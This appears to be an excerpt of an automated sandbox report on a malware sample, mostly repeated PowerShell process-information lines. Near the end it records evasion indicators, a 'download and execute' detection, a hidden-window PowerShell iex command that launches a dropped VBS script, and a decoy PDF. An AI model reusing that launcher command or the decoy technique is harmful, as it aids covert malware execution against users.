      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3298Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6404Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6265Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3440Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep count: 6265 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep count: 3440 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5484Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.1786312887.000001CA73401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DV
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000008.00000002.2706581492.00000268AD454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2705375628.00000268A7E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_3284.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
